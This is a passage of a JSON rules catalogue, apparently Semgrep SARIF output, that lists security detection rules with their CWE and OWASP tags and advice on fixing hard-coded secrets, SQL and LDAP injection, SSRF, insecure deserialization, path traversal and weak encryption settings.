retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"help":{"markdown":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n","text":"The application was observed to store keychain items that leverage user authentication but allow the passcode fallback. Biometric modalities are considered more secure than 4 or 6 digit pincodes on iOS, and should be preferred over the passcode."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","id":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","name":"swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.pass-fallback.keychain-passcode-fallback"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string)\n - [https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet](https://rorsecurity.info/portfolio/ruby-on-rails-sql-injection-cheat-sheet)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as Sequelize which will protect your queries."},"helpUri":"https://semgrep.dev/r/ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","id":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","name":"ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.aws-lambda.security.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint)\n - [https://docs.rs/reqwest/latest/reqwest/](https://docs.rs/reqwest/latest/reqwest/)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/rust.rocket.ssrf.reqwest-taint.reqwest-taint","id":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","name":"rust.rocket.ssrf.reqwest-taint.reqwest-taint","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: rust.rocket.ssrf.reqwest-taint.reqwest-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","id":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","name":"python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.net.tainted-fastapi-http-request-pycurl.tainted-fastapi-http-request-pycurl"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) We do not recommend deserializing untrusted data with the `ObjectInputStream`. If you must, you can try overriding the `ObjectInputStream#resolveClass()` method or using a safe replacement for the generic `readObject()` method."},"helpUri":"https://semgrep.dev/r/java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","id":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","name":"java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.objectinputstream-deserialization-spring.objectinputstream-deserialization-spring"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"help":{"markdown":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS EBS is unencrypted. The AWS EBS encryption protects data in the EBS."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","id":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","name":"terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-unencrypted.aws-ebs-unencrypted"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"help":{"markdown":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges)\n - [https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"Service '$SERVICE' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this."},"helpUri":"https://semgrep.dev/r/yaml.docker-compose.security.no-new-privileges.no-new-privileges","id":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","name":"yaml.docker-compose.security.no-new-privileges.no-new-privileges","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.docker-compose.security.no-new-privileges.no-new-privileges"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","id":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","name":"cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-filter.ldap-injection-filter"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in PHP, it is possible to adopt prepared statements by using `PDO` with bind variables using `bindParam()`."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","id":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","name":"php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-native-sql-injection.laravel-native-sql-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"help":{"markdown":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0](https://docs.microsoft.com/en-us/dotnet/api/system.runtime.serialization.formatters.typefilterlevel?view=net-6.0)\n - [https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html](https://www.synacktiv.com/en/publications/izi-izi-pwn2own-ics-miami.html)\n","text":"Using a .NET remoting service can lead to RCE, even if you try to configure TypeFilterLevel. Recommended to switch from .NET Remoting to WCF https://docs.microsoft.com/en-us/dotnet/framework/wcf/migrating-from-net-remoting-to-wcf"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","id":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","name":"csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.insecure-typefilterlevel-full.insecure-typefilterlevel-full"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"help":{"markdown":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/resource-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py)\n","text":"Ensure IAM policies don't allow resource exposure. These actions can expose AWS resources to the public. For example `ecr:SetRepositoryPolicy` could let an attacker retrieve container images. Instead, use another action that doesn't expose AWS resources."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","id":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","name":"terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-resource-exposure.no-iam-resource-exposure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"help":{"markdown":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n","text":"Path traversal may allow malicious actors to access file content not intended to be exposed to them. For example a user may be able to access sensitive secrets stored within app files (e.g. UserDefaults/Plists/.etc.). Alternatively, users with access to a victim's phone may be able to obtain senstivie data persisted by the application."},"helpUri":"https://semgrep.dev/r/swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","id":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","name":"swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal","properties":{"precision":"very-high","tags":["CWE-35: Path Traversal","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: swift.pathtraversal.filemanager-pathtraversal.swift-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EBS Volume is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","id":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","name":"terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ebs-volume-encrypted-with-cmk.aws-ebs-volume-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.sqlx.pg-connection-url.pg-connection-url","id":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","name":"rust.secrets.sqlx.pg-connection-url.pg-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.sqlx.pg-connection-url.pg-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"help":{"markdown":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account#min_tls_version)\n - [https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version](https://docs.microsoft.com/en-us/azure/storage/common/transport-layer-security-configure-minimum-version)\n","text":"Azure Storage currently supports three versions of the TLS protocol: 1.0, 1.1, and 1.2. Azure Storage uses TLS 1.2 on public HTTPS endpoints, but TLS 1.0 and TLS 1.1 are still supported for backward compatibility. This check will warn if the minimum TLS is not set to TLS1_2."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","id":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","name":"terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-use-secure-tls-policy.storage-use-secure-tls-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512"},"help":{"markdown":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. Per OWASP guidance, 210K iterations should be used with SHA512\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insufficient-pbkdf2-work-factor-sha512.insufficient-pbkdf2-work-factor-sha512)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://pages.nist.gov/800-63-3/sp800-63b.html#sec5](https://pages.nist.gov/800-63-3/sp800-63b.html#sec5)\n","text":"PBKDF2 usage was identified with an insufficient work factor, i.e. an iteration count (rounds) lower than modern guidelines prescribe. 